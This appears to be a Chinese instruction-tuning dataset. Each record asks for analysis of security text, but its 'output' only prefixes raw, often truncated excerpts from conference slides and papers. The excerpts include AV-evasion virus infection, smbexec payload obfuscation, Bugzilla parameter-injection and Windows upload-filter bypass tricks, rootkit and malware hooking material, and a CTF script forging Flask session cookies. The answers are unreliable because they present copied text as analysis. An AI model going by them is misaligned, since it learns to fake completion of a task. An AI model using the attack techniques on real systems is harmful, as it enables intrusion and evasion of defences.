Test Site, data on blast protection Loose Nukes  Old bomb cores remain unaccounted for/lost  Most thefts have been by small time criminals  No recorded instances in bomb-size quantity  Successfully smuggling strategy limited to submarines, tunnels, low flying drones  Proliferation has thus far eluded non-state actors Asymmetric Warfare: The Mouse Th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeat to 1337 Mike Arpaia & Ted Reed Creating A Successful University Cyber Defense Organization (Note: slide text will be mostly replaced by images during the presentation, this deck is designed as a handout) This presentation... Will show you a five step program to: 1. Plan! - make a goal for yourself and your university 2. Recruit! - reach out to the campus, find interested parties 3. Organize! - gather resources, don't sulk over no budget 4. Learn! - understand everyone's skills, abilities, and interests 5. Play! - compete, join a competition, start evaluating your skills ...And we'll give out prizes! So try to be involved! Problem  Everyone wants to be a hacker but you're not going to learn how to hack in \"Theoretical Computer Science 101\"  Even in information assurance classes, often times the subject matter is so high-level that you can't really get anything (practical) out of it...  You may not have enough information security knowledge to walk up and be a pen-tester or researcher  You may not know enough people to make a team Our solution!  We compiled data about past competitions for you to use, learn from, and ramp up your team to compete this coming year!  We compiled a detailed guide from what we've learned and professionals we've sought advice from!  We modified a collaboration software solution to help students play, organize and participate in CTFs!  We recommend a hardware solution to complement  Plan to distribute the software as an ISO image What's in the Data?  What we did and what works  Don't reinvent the wheel... we did it for you  How to stop complaining about the things that are holding you back and start owning some n00bs!  Tips on how to organize, educate and motivate a team of lazy college kids  A calendar of national and international CTF-style competitions that you and your team can compete in! What's in the Guide?  Chapters and lesson plans on a wide range of information security topics including:  web application security  source code ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHOST = \"localhost\" PORT = 1337 import os import sys from FLAG import FLAG from pwn import * import multiprocessing r = None remote_start_time = None LED = 64 state = [[0 for i in range(4)] for j in range(4)] MixColMatrix = [ [4, 1, 2, 2], [8, 6, 5, 6], [11,14,10, 9], [2, 2,15,11], ] sbox = [12, 5, 6, 11, 9, 0, 10, 13, 3, 14, 15, 8, 4, 7, 1, 2] WORDFILTER = 0xF def FieldMult(a,b): ReductionPoly = 0x3 x = a ret = 0 for i in range(0,4): if (b>>i)&1 == 1: ret = x if (x&0x8) != 0: x <<= 1 x = ReductionPoly else: x <<= 1 return ret&WORDFILTER def AddKey(keyBytes,step): global state for i in range(0,4): for j in range(0,4): state[i][j] = keyBytes[(4*i+j+step*16)%(LED/4)] return state def AddConstants(r): global state RC = [ 0x01, 0x03, 0x07, 0x0F, 0x1F, 0x3E, 0x3D, 0x3B, 0x37, 0x2F, 0x1E, 0x3C, 0x39, 0x33, 0x27, 0x0E, 0x1D, 0x3A, 0x35, 0x2B, 0x16, 0x2C, 0x18, 0x30, 0x21, 0x02, 0x05, 0x0B, 0x17, 0x2E, 0x1C, 0x38, 0x31, 0x23, 0x06, 0x0D, 0x1B, 0x36, 0x2D, 0x1A, 0x34, 0x29, 0x12, 0x24, 0x08, 0x11, 0x22, 0x04 ] state[1][0] = 1 state[2][0] = 2 state[3][0] = 3 state[0][0] = (LED>>4)&0xf state[1][0] = (LED>>4)&0xf state[2][0] = LED & 0xf state[3][0] = LED & 0xf tmp = (RC[r] >> 3) & 7 state[0][1] = tmp state[2][1] = tmp tmp = RC[r] & 7 state[1][1] = tmp state[3][1] = tmp def SubCell(): global state for i in range(0,4): for j in range(0,4): state[i][j] = sbox[state[i][j]] def ShiftRow(): global state tmp = [0]*4 for i in range(1,4): for j in range(0,4):tmp[j] = state[i][j] for j in range(0,4):state[i][j] = tmp[(j+i)%4] def MixColumn(): global state tmp = [0]*4 for j in range(0,4): for i in range(0,4): sum = 0 for k in range(0,4): sum = FieldMult(MixColMatrix[i][k], state[k][j]) tmp[i] = sum for i in range(0,4):state[i][j] = tmp[i] def host_encrypt_for_key(input,userkey,sbox_lazy,rounds): \"\"\" input - list of integers from range 0x0 - 0xFF userkey - list of integers from range 0x0 - 0xFF rounds - lazy sbox_lazy - my chosen sbox_lazy returns: string \"\"\" global state, LED ksbits = 16*8", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Ghost in the Wireless, iwlwifi Edition Nicolas Iooss, Gabriel Campana #BHUSA @BlackHatEvents Information Classification: General Context - Up-to-date Ubuntu 18.04 LTS - HTTP server - Android smartphone 2 #BHUSA @BlackHatEvents Information Classification: General Context # dmesg iwlwifi 0000:01:00.0: Start IWL Error Log Dump: iwlwifi 0000:01:00.0: Status: 0x00000100, count: 6 iwlwifi 0000:01:00.0: Loaded firmware version: 34.0.1 ... iwlwifi 0000:01:00.0: Start IWL Error Log Dump: iwlwifi 0000:01:00.0: Status: 0x00000100, count: 7 iwlwifi 0000:01:00.0: 0x00000070 | ADVANCED_SYSASSERT ... iwlwifi 0000:01:00.0: 0x004F01A7 | last host cmd ieee80211 phy0: Hardware restart was requested 3 #BHUSA @BlackHatEvents Information Classification: General Why this research? - This chip implements complex features - Likely to have vulnerabilities - No public research about the security of Intels Wi-Fi chips - Prior art: Broadcoms Wi-Fi cards and Intels NIC - This sounds fun - Yet another smart piece of hardware, widely used in laptops - The chip has DMA (Direct Memory Access) by design, because network - DMA attacks: FireWire attacks, PCIe screamer, Thunderspy, Thunderclap 4 #BHUSA @BlackHatEvents Information Classification: General Studied Wi-Fi chips Intel Wireless-AC 9560 (Picture of a Companion RF Module) Intel Wireless-AC 8260 5 #BHUSA @BlackHatEvents Information Classification: General Agenda - The firmware & talking to the chip - Vulnerability research - Dynamic analysis experiments - DMA through the paging memory 6 #BHUSA @BlackHatEvents Information Classification: General The Firmware 7 -X 7 #BHUSA @BlackHatEvents Information Classification: General Intel WireLess (IWL) Wi-Fi on Linux 8 FW #BHUSA @BlackHatEvents Information Classification: General iwlwifi chooses a compatible firmware file using the API version https://git.kernel.org/pub/scm/linux/kernel/git/firmware/linux-firmware.git/ Firmware file (for Intel Wireless for Linux) # dmesg iwlwifi 0000:00:14", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nState Interoperable Communications: DHS Funded Activities Fiscal Years 2003 - 2005 May 2006 Office of Grants and Training Preparedness Directorate U.S. Department of Homeland Security ii State Interoperable Communications: DHS Funded Activities May 2006 Table of Contents May 2006 State Interoperable Communications: DHS Funded Activities iii Table of Contents INTEROPERABLE COMMUNICATIONS ALLOCATIONS. 1 Interoperable Communications Allocation Summary..................................................... 3 Interoperable Communications Equipment Allocation State Summary ......................... 5 INTEROPERABLE COMMUNICATIONS SUMMARY SUPPORTING GRAPHS ..................... 7 INTEROPERABLE COMMUNICATIONS STATE SUMMARIES ..................................... 13 Alabama Information...............................15 Alaska Information ..................................17 American Samoa Information .................19 Arizona Information................................ 21 Arkansas Information ..............................23 California Information ............................25 Colorado Information..............................27 Connecticut Information......................... 29 Delaware Information .............................31 District of Columbia Information ...........33 Florida Information.................................35 Georgia Information................................37 Guam Information...................................39 Hawaii Information.................................41 Idaho Information ................................... 43 Illinois Information.................................45 Indiana Information ................................47 Iowa Information.....................................49 Kansas Information..................................51 Kentucky Information .............................53 Louisiana Information .............................55 Maine Information................................... 57 Maryland Information .............................59", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n对抗AV检测 -- 病毒遗传感染 对抗AV检测 -- 病毒遗传感染 技术的探索 技术的探索 nEINEI/[bytehero team] 病毒遗传感染技术的探索 病毒遗传感染技术的探索  内容介绍 关于病毒遗传感染技术  关于病毒遗传感染技术  - 计算机病毒/人工生命/自进化  - 多态/ 变形之后的思路  - 多态/变形的弱点在哪里  遗传感染的一种实现思路  - 舍弃掉解密器/收缩器 舍弃掉解密器/收缩器  - 构造一个新的变形机制  - 病毒基因的提取  - 宿主交叉/变异点的选择 宿主交叉/变异点的选择  - 构造宿主/病毒的双执行环境  - 宿主/病毒及感染后的重定位  完整的遗传感染变形方式  - 完整的遗传感染变形方式  遗传感染思路的扩展  AV检测的弱点剖析 未来可能的检测对抗  未来可能的检测对抗  关于病毒遗传感染技术 关于病毒遗传感染技术  计算机病毒/人工生命/自进化  人工生命的概念是源于1987年美国桑塔菲研究院的Langton教授提出人工 生命就是具有生命现象和特征的人造系统 生命就是具有生命现象和特征的人造系统   普通病毒 -- 体现了人工生命现象的一种表达方式 加密/多态/变形 体现了自进化的变异过程 是对抗反病毒检测技术的  加密/多态/变形 -- 体现了自进化的变异过程是对抗反病毒检测技术的 自我进化方式 该方向的研究情况  该方向的研究情况:  2005年,SPTH在RRLF#6发表Code Evolution: Follow nature's example, 从指令变形的角度阐述了如何像生物自然选择那样进行代码变异  2008年,saec在EOF-DR-RRLF发表Evolutionary Virus Propagation Technique这是从代码实现角度设想了如何像生物病毒那样的具有遗传变异 的感染方式 这在很大程度上区别于现有复杂的感染方式 的感染方式这在很大程度上区别于现有复杂的感染方式 ... 关于病毒遗传感染技术 关于病毒遗传感染技术  多态/变形之后的思路 1 代码集成方式 重建宿主程序 使病毒代码分片插入到宿主中与其  1 代码集成方式重建宿主程序使病毒代码分片插入到宿主中与其 混合该方式实现极其复杂目前仅有与之最为接近的是zmist病毒 2 虚拟化感染 借助VMP t t中的思路 设计病毒自己的 d  2 虚拟化感染借助VMProtect中的思路设计病毒自己的p-code 需要实现一个病毒自己的虚拟机 3 未来的设想 利用宿主程序本身的指令 构造出病毒使用的代码  3 未来的设想利用宿主程序本身的指令构造出病毒使用的代码 而病毒代码仅是连接这些指令执行的组织者本身并没有恶意的 操作,且融入宿主程序  ...  那么是否存在一种感染方式它既易于编写又能做到完全变形又 有很好的anti-av效果呢 关于病毒遗传感染技术 关于病毒遗传感染技术  多态/变形的弱点在哪里  1 多态技术的解密过程始终都是最薄弱的环节需要隐藏好  2 变形技术的产生的文件体积过大80%左右都是变形引擎的代码 变形技术的产生的文件体积过大80%左右都是变形引擎的代码  3 变形引擎中收缩器编写难度大一旦处理不好在感染N代后将导 致宿主文件大小极巨膨胀 致宿主文件大小极巨膨胀  4 编写中意想不到的因素及设计上的漏洞导致很容易被通配符匹配 静态启发式等技术检测到 静态启发式等技术检测到 遗传感染的一种实现思路 遗传感染的 种实现思路 从生物病毒那里寻找些思路  从生物病毒那里寻找些思路  I 生物病毒的突变形式点突变和染色体突变:  a丢失) 1 - 2 - 3 - 4 - 5 - 6 - 7  1 - 2 - 4 - 5 - 6 - 7  b重复): 1 2 3 4 5 6 7  b重复): 1 - 2 - 3 - 4 - 5 - 6 - 7  1 - 2 - 3 - 3 - 4 - 5 - 6 - 7  c倒序): 1 - 2 - 3 - 4 - 5 - 6 - 7  1 - 2 - 4 - 3 - 5 - 6 - 7  d插入): 1 - 2 - 3 - 4 - 5 - 6 - 7  1 - 2 - 3 - 4 - x1- x2 - 5 - 6 - 7 1 2 3 4 x1 x2 5 6 7  e易位): a1 - a2 - a3 - a4 - a5 - a6 |b1 - b2 - b3 - b4 - b5 - b6  a1 - b2 - b3 - a5 - b1 - b6 |b1 - b6 - b5 遗传感染的一种实现思路 遗传感染的 种实现思路 II 生物病毒和我们 i d 的关系  II 生物病毒和我们virus code的关系  DNA <--> CODE | Chromo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPowerShot Basic Oren Isacson, Alfredo Ortega August 1, 2010 Abstract An (incomplete) specification of the Basic language included in several Canon Powershot Cameras. 1 Contents 0.1 Executing Scripts . . . . . . . . . . . . . . . . . . . . . . . . . . . 14 0.1.1 Format of the SD card . . . . . . . . . . . . . . . . . . . . 14 0.1.2 Script extend.m . . . . . . . . . . . . . . . . . . . . . . . . 14 0.1.3 Starting the script . . . . . . . . . . . . . . . . . . . . . . 14 0.1.4 Automatic script . . . . . . . . . . . . . . . . . . . . . . . 14 0.2 Language constructs . . . . . . . . . . . . . . . . . . . . . . . . . 15 0.2.1 operators . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 0.2.2 Dim . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 15 0.2.3 for-next . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 0.2.4 do-while . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16 0.2.5 subroutines . . . . . . . . . . . . . . . . . . . . . . . . . . 16 0.3 Common functions() . . . . . . . . . . . . . . . . . . . . . . . . . 16 0.3.1 ExMem.View() . . . . . . . . . . . . . . . . . . . . . . . . 17 0.3.2 ExMem.AllocUncacheable() . . . . . . . . . . . . . . . . . 17 0.3.3 ExMem.FreeUncacheable() . . . . . . . . . . . . . . . . . 17 0.3.4 ExMem.AllocCacheable() . . . . . . . . . . . . . . . . . . 17 0.3.5 ExMem.FreeCacheable() . . . . . . . . . . . . . . . . . . . 17 0.3.6 StartCameraLog() . . . . . . . . . . . . . . . . . . . . . . 17 0.3.7 ShowCameraLog() . . . . . . . . . . . . . . . . . . . . . . 17 0.3.8 ShowCameraLogInfo() . . . . . . . . . . . . . . . . . . . . 18 0.3.9 StopCameraLog() . . . . . . . . . . . . . . . . . . . . . . 18 0.3.10 PutsCameraLogEvent() . . . . . . . . . . . . . . . . . . . 18 0.3.11 OpLog.Create() . . . . . . . . . . . . . . . . . . . . . . . . 18 0.3.12 drysh() . . . . . . . . . . . . . . . . . . . . . . . . . . . . 18 0.3.13 NewTaskShell() . . . . . . . . . . . . . . . . . . . . . . . . 18 0.3.14 ExMem() . . . . . . .", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Android WebView跨域访问漏洞(CNVD-2017-36682) > 腾讯玄武实验室 2017年12月7日 ### 漏洞描述 Android WebView存在跨域访问漏洞该漏洞产生的原因是由于Android应用WebView开启了file域访问且允许file域访问http域未对file域的路径做严格限制所致攻击者可以利用漏洞远程获取APP中的所有本地敏感数据 ### 影响范围 漏洞影响使用WebView控件开启file域访问并且未按安全策略开发的Android应用APP ### 漏洞详情 #### 漏洞位置 ```java public class WebViewActivity extends Activity { private WebView webView; public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_webview); webView = (WebView) findViewById(R.id.webView1); //webView.getSettings().setAllowFileAccess(false); (1) //webView.getSettings().setJavaScriptEnabled(true); (2) //webView.getSettings().setAllowFileAccessFromFileURLs(true); (3) //webView.getSettings().setAllowUniversalAccessFromFileURLs(true); (4) Intent i = getIntent(); String url = i.getData().toString(); webView.loadUrl(url); } } ``` #### 漏洞触发条件 1. WebView中setAllowFileAccessFromFileURLs 或setAllowUniversalAccessFromFileURLsAPI配置为true 2. WebView可以直接被外部调用并能够加载外部可控的HTML文件 #### 漏洞原理 在Android应用中WebView开启了file域访问允许file域访问http域且未对file域的路径进行严格限制所致攻击者通过URL Scheme的方式可远程打开并加载恶意HTML文件远程获取APP中包括用户登录凭证在内的所有本地敏感数据 ### poc/exp #### 例子 1 某个app 1. 如图X5WebView类继承了webview类并且设置了允许file协议以及启用了javascript执行; ![11111](png/webview_cros_1.png) 2. 再看看使用该X5Webview类的Activity发现URL是从intent传递的对象中获取的并且没有做任何白名单处理直接启动了Activity; ![11111](png/webview_cros_2.png) 3. 并且发现该activity是可导出的如图 ![11111](png/webview_cros_3.png) 基于以上三点攻击者可以用恶意链接实现生成本地恶意攻击html并传递恶意html的file路径给可导出的组件该组件加载访问html文件执行其中的恶意js会导致私有目录中的文件被攻击者获取 ### 漏洞修复建议 1. file域访问为非功能需求时手动配置setAllowFileAccessFromFileURLs或setAllowUniversalAccessFromFileURLs两个API为false Android4.1版本之前这两个API默认是true需要显式设置为false因未找到设置的接口4.1版本之前暂不做操作4.1版本后需要防止显示设置为true如果设置为true的话防止loadUrl的传参url为可被攻击的 2. 若需要开启file域访问则设置file路径的白名单严格控制file域的访问范围具体如下 - 固定不变的HTML文件可以放在assets或res目录下file:///android_asset和file:///android_res 在不开启API的情况下也可以访问 - 可能会更新的HTML文件放在/data/data/(app) 目录下避免被第三方替换或修改 - 对file域请求做白名单限制时需要对../../特殊情况进行处理避免白名单被绕过 3. 避免App内部的WebView被不信任的第三方调用排查内置WebVi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPCI: Compromising Controls and Compromising Security PCI? At DefCon? Compliance is changing the way companies \"do security\", and that has an effect on everyone, hacker, defender, attacker, and innocent bystander. One result is that companies fear QSAs more than 0-days. Who are we?  James Arlen, aka Myrcurial  Anton Chuvakin  Joshua Corman  Jack Daniel  Alex Hutton  Martin McKeay  Dave Shackleford Usual disclaimers  We do not speak for our employers, clients or customers. Nor for our spouses, siblings, or offspring. But my dog will back me up.  Our opinions are our own, the facts are as we see them.  We arent lawyersetc.  These QSAs are not your QSAs. PCI. Discuss.  PCI vs. Security. Is it really vs. security?  PCI hampers the advanced. Right? Really?  At least it is timely. And the three years cycle insures that.  PCI has an impact on ALL of us, even if not under the heel of its hobnail boot. Or does it? Obligatory Bell Curve Slide More accurate curves With pictures, even. Zombie resistant housing? PCI and metrics.  PCI could provide some very useful data about security postures, exposures, breaches, and all kinds of cools stuff.  Could.  Does it?  Should it? Moving forward  How do we move forward?  Who do we have to convince?  What moves them? Previous conversations CSO Online Debate Part 1 of 2: http://www.csoonline.com/podcast/513988/The_Great_PCI_Security_Debate_of_2010_Part_1 Network Security Podcast Part 2 of 2: http://netsecpodcast.com/?p=391 Southern Fried Security Podcast  Special Episode: http://www.southernfriedsecurity.com/episodes-0-9/special-episode---interview-with-josh- corman ShmooCon 2010 http://www.shmoocon.org/2010/videos/PCI-Panel.flv BSidesSF Panel Video http://www.ustream.tv/recorded/5164678 (pt 1) http://www.ustream.tv/recorded/5165234 (pt 2) Contact us  James Arlen @myrcurial  Anton Chuvakin @anton_chuvakin  Joshua Corman @joshcorman  Jack Daniel @jack_daniel  Alex Hutton @alexhutton  Martin McKeay @mckeay  Dave Shackleford @daveshackleford ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nProprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Getting the goods with smbexec Eric Milam  Brav0hax Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. Dont you know who I am?  Attack & Pen -> Accuvant LABS  Open Source Projects -> easy-creds, smbexec, ettercap, Kali Linux Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. What is smbexec? What does it do? Why should I care?  Theres nothing 0 day here! BOO!  Yes, but automation is awesome!  You can use this tool immediately  It will make post-exploitation much easier Whats this all about? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  Bash script, yes, a bash script  1 week of work, consuming a years worth of Mountain Dew  Power of the tool lies in smbclient & winexe  smbclient to get/put files  winexe to execute What is smbexec? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved.  Standard msf payloads with psexec module kept getting popped by AV  Custom exes also popped because AV trigger is on injection (service protection)  Damn you trend micro, but thanks for the motivation  Blog post from Carnal0wnage  Upload and execute your payload Why write smbexec? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. I want my shells and I want them now!  Creates an obfuscated payload that will bypass most commercial AV  Enable Hyperion Crypter to encrypt the payload  Creates a Metasploit rc file and launches a Metasploit listener to make things easy.  Attack can be launched in xterm or screen What have you done for me lately? Proprietary and Confidential. Do Not Distribute.  2013 Accuvant, Inc. All Rights Reserved. What? You can get all this great stuff with winexe and native windows commands?", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n蔡政達 a.k.a Orange  CHROOT 成員 / HITCON 成員 / DEVCORE 資安顧問  國內外研討會 HITCON, AVTokyo, WooYun 等講師  國內外駭客競賽 Capture the Flag 冠軍  揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱 點漏洞  專精於駭客手法Web Security 與網路滲透 #90後 #賽棍 #電競選手 #滲透師 #Web狗 #  講 Web 可以講到你們聽不懂就贏了  黑了你從不是在你知道的那個點上  擺在你眼前是 Feature擺在駭客眼前就是漏洞 - 別人笑我太瘋癲我笑他人看不穿 - 猥瑣流 Q: 資料庫中的密碼破不出來怎麼辦 第三方內 容安全 前端 安全 DNS 安全 Web應用 安全 Web框架 安全 後端語言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 XSS XXE SQL Injection CSRF 第三方內 容安全 前端 安全 DNS 安全 Web應用 安全 Web框架 安全 後端語言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack 第三方內 容安全 前端 安全 DNS 安全 Web應用 安全 Web框架 安全 後端語言 安全 Web伺服 器安全 資料庫 安全 作業系統 安全  - Perl 語言特性導致網頁應用程式漏洞  @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; @list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname => $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin - Windows 特性造成網頁應用限制繞過   Windows API 檔名正規化特性 - shell.php # shel>.php # shell\"php # shell.<  Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip  Windows NTFS 特性 - download.php::$data  講些比較特別的", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nModule 2 Typical goals of malware and their implementations https://github.com/hasherezade/malware_training_vol1 Hooking Hooking: the idea Hooking means intercepting the original execution of the function with a custom code Goal: to create a proxy through which the input/output of the called function bypasses Possible watching and/or interference in the input/output of the function Hooking: the idea  Calling the function with no hook: Call Function(arg0,arg1) Function: (process arg0, arg1) ... ret Hooking: the idea  Calling the hooked function: the high-level goals Intercept: Arg0, arg2 Call Function ret Call Function(arg0,arg1) Function: (process arg0, arg1) ... ret Hooking: who? Hooking is used for intercepting and modifying API calls  By malware: i.e. spying on data  By Anti-malware: monitoring execution  Compatibility patches (Operating System level) - i.e. shimming engine  Extending functionality of the API Hooking in malware Sample purposes of hooks used by malware:  Hiding presence in the system (rootkit component)  Sniffing executions of APIs (spyware)  Doing defined actions on the event of some API being called (i.e. propagation to a newly created processes, screenshot on click)  Redirection to a local proxy (in Banking Trojans) Hooking: how? There are various, more or less documented methods of hooking. Examples:  Kernel Mode (*will not be covered in this course)  User Mode:  SetWindowsEx etc.  monitoring system events  Windows subclassing  intercepting GUI components  Inline/IAT/EAT Hooking  general API hooking Monitoring system events  Windows allows for monitoring certain events, such as:  WH_CALLWNDPROC  monitor messages sent to a window  WH_KEYBOARD  WH_KEYBOARD_LL  etc.  The hook can be set via SetWindowsHookEx  This type of hooks are often used by keyloggers Monitoring system events  Example: Remcos RAT https://www.virustotal.com/gui/file/47593a26ec7a9e791bb1c94f4c4d56deaae25f37b7f77b0a44dc93ef0bca91fd Monitoring system events  Example: Remcos RAT W", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSHADOW WALKER SHADOW WALKER Raising The Bar For Rootkit Detection Raising The Bar For Rootkit Detection by Sherri Sparks & Jamie Butler What Is A Rootkit? What Is A Rootkit?  Defining characteristic is stealth.  Viruses reproduce, but rootkits hide!  Greg Hoglund, author of NT Rootkit defines a rootkit as a set of programs which patch and trojan existing execution paths within the system. What is a rootkit used for? What is a rootkit used for?  It is usually used by a hacker to conceal his / her presence on a compromised system and make it possible to return undetected at some later date.  Indirect overlap with parental control software and spyware. Rootkits & x86 Hardware Architecture: Rootkits & x86 Hardware Architecture: Pentium Protection Rings Pentium Protection Rings  Ring 0  full access to all memory and the entire instruction set.  Kernel Rootkits  Ring 3 restricted memory access and instruction set availability.  User Rootkits Rootkits & The Operating System Rootkits & The Operating System  The user / application view of the system is defined by what the OS provides to it via the API interface.  A rootkit hides by intercepting and altering communications at the interfaces between various OS components.  Rootkits are a form of man in the middle attack. OS Components Attacked By OS Components Attacked By Rootkits Rootkits  I/O Manager  Logging keystrokes or network activity  Device & File System Drivers  Hiding files  Object Manager  Hiding object (process / thread) handles.  Security Reference Monitor  Disable security policies governing runtime access checks on objects.  Process & Thread Manager  Hiding processes & threads  Configuration Manager  Hiding registry entries First Generation Rootkits First Generation Rootkits  Replaced / modified system files on the victims hard disk  Example: UNIX login program Second Generation Rootkits Second Generation Rootkits  Modify static OS components / structures loaded in memory.  Table based hooking approaches (IAT, ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Generated by Django 2.2.3 on 2019-08-02 19:41 from django.db import migrations, models from django.contrib.postgres.fields import JSONField class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Collection', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=128)), ('detail', JSONField()), ], ), ]", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWP use https://github.com/noraj/flask-session-cookie-manager import os import string a=string.digits+string.ascii_letters for i in range(0,len(a)): name='python3 ense.py encode -s \"KEY_SECRET_PWN_HUB\" -t \" {\\'username\\':\\'Ne'+a[i]+'\\'}\"' os.system(name) output: eyJ1c2VybmFtZSI6Ik5lMCJ9.XbpKQQ.Eq9AjAwo7K2lmbRR1k7lwI5P15M eyJ1c2VybmFtZSI6Ik5lMSJ9.XbpKQQ.v2MQV4MWcvLmS9a6KOU7Qqcu8tc eyJ1c2VybmFtZSI6Ik5lMiJ9.XbpKQg.ugDoLOgtrjN24xcrefEfksNEV18 eyJ1c2VybmFtZSI6Ik5lMyJ9.XbpKQg.kvjDJQH-QXU5fCpdnA-r4QWdjUc eyJ1c2VybmFtZSI6Ik5lNCJ9.XbpKQg.gvzw-_vChiXWNEIBVB4cj3q3MTs eyJ1c2VybmFtZSI6Ik5lNSJ9.XbpKQg.SBs7I0wnU_XBSQ2ILrQHXin82p8 eyJ1c2VybmFtZSI6Ik5lNiJ9.XbpKQg.zKGDGIQI_dHGnH2qWmc_QuFs0WM eyJ1c2VybmFtZSI6Ik5lNyJ9.XbpKQg.aInS9Xr8Kc-AS4xF4F0htW30PT4 eyJ1c2VybmFtZSI6Ik5lOCJ9.XbpKQg.-pooPMNGrZ7vAhhufBhGNyPgibY eyJ1c2VybmFtZSI6Ik5lOSJ9.XbpKQw.rZZxXjTRWpzp90iFnjcAKETrtoQ eyJ1c2VybmFtZSI6Ik5lYSJ9.XbpKQw.6eUoM_4YXhQtw2PzAlZxni5M68A eyJ1c2VybmFtZSI6Ik5lYiJ9.XbpKQw.JvWxxkh35EeY_RUWE8t4TFJU3P0 eyJ1c2VybmFtZSI6Ik5lYyJ9.XbpKQw.ZrGxmxmoLq9yMeB2yRh9N4A15H4 eyJ1c2VybmFtZSI6Ik5lZCJ9.XbpKQw.8i-SyjOaCHhcLvne-RifMJysQhM eyJ1c2VybmFtZSI6Ik5lZSJ9.XbpKQw.YrDJMdeZNdC5qg5WlnjDRjxIsj4 eyJ1c2VybmFtZSI6Ik5lZiJ9.XbpKQw.9gXKtKQBSFIGj4pC47__QH02iu4 eyJ1c2VybmFtZSI6Ik5lZyJ9.XbpKQw.j-7bWauGJoAU__Ur5K_uF8eaYaQ eyJ1c2VybmFtZSI6Ik5laCJ9.XbpKRA.HdUtVoGi8HegbqfbtVRsx8IHlO4 eyJ1c2VybmFtZSI6Ik5laSJ9.XbpKRA.mdvIB58YOEAFuuXDI0zuNXmTdmg eyJ1c2VybmFtZSI6Ik5laiJ9.XbpKRA.qTWMfGnALkH0vTtuCUbcZsFst3M eyJ1c2VybmFtZSI6Ik5layJ9.XbpKRA.Qf0wHpTkrXS9tw66H2xXthvlfcE eyJ1c2VybmFtZSI6Ik5lbCJ9.XbpKRA.cj_QWrXXGCDbDBmFmTIMBxOCUoo eyJ1c2VybmFtZSI6Ik5lbSJ9.XbpKRA.Vy3c6UNnpOvCOn30w72Qlo9CRJk eyJ1c2VybmFtZSI6Ik5lbiJ9.XbpKRA.YWXfeC20MlaUqVeVH-zlOGWh5RI eyJ1c2VybmFtZSI6Ik5lbyJ9.XbpKRA.gF03xQvJaP13Dr1gJs0hTz31GFs 